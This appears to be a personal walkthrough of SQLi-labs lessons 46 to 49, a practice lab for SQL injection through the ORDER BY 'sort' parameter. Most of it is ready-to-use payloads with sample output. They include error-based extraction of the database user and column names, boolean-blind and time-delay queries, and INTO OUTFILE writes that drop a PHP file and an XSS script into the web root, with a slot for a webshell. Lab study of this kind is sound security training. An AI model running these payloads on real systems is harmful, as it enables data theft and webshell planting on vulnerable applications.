SQLi-labs: Lesson 46

Payloads in Lesson 17 work here.

Query 1: ?sort=(select count(column_name) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))#

Result 1:

Duplicate entry '::root@localhost::0' for key 'group_key'

Query 2: ?sort=(select 1 from (select count(*),concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c,floor(rand()*2))a from information_schema.tables group by a)b)#

Result 2:

Duplicate entry '\id,username,password\1' for key 'group_key'

Blind Injection

right(), left(), rand() functions.

Utilizing sort=rand(true/false), try the following queries:

• ?sort=rand(ascii(left(database(),1))=115) OR ?sort=rand(left(database(),1)='s') OR ?sort=rand(ascii(left(database(),1))=ascii('s'))
• ?sort=rand(ascii(right(database(),1))=121) OR ?sort=rand(right(database(),1)='y') OR ?sort=rand(ascii(right(database(),1))=ascii('y'))

Time Delay Injection (lesson 9&10)

• ?sort= (SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)--+
• ?sort=if(substr(version(),1,1)=5, sleep(3),null)--+
• ?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))--+

Procedure Analyse

Refence: here

It seems my database version cannot use this method as referenced.

Error message:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'extractvalue(rand(),concat(0x3a,version())),1)' at line 1

Upload Webshell via Outfile

?sort=1 into outfile "/var/www/html/sqli/Less-46/1.txt" lines terminated by (your webshell here)

Trigger a xss attack: ?sort=1 into outfile "/var/www/html/sqli/Less-46/1.html" lines terminated by '<script>alert(123)</script>'

SQLi-labs: Lesson 47

Error based - single quote.

Blind injection is not accurate here(). So we need to use other methods.

Queries in Lesson 17 WORKS here.

Time Delay Injection also works: ?sort=1' and if(substr(version(),1,1)=5, sleep(3),null)--+

Webshell

?sort=1' into outfile "/var/www/html/sqli/Less-47/1.php" lines terminated by '<?php phpinfo();?>'--+

OR in HEX version:

?sort=1' into outfile "/var/www/html/sqli/Less-47/1.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

This query load all php configuration info to 1.php.

SQLi-labs: Lesson 48

Blind based.

Utilizing sort=rand(true/false):

• ?sort=rand(ascii(left(database(),1))=115)--+
• ?sort=rand(left(database(),8)='security')--+

Time delay injection and outfile (webshell) injection also works!

SQLi-labs: Lesson 49

Blind based - single quote.

Similar to previous lessons.

Time Delay

?sort=1' and if(substr(version(),1,1)=5, sleep(3),null)--+

Outfile (webshell) injection also works!**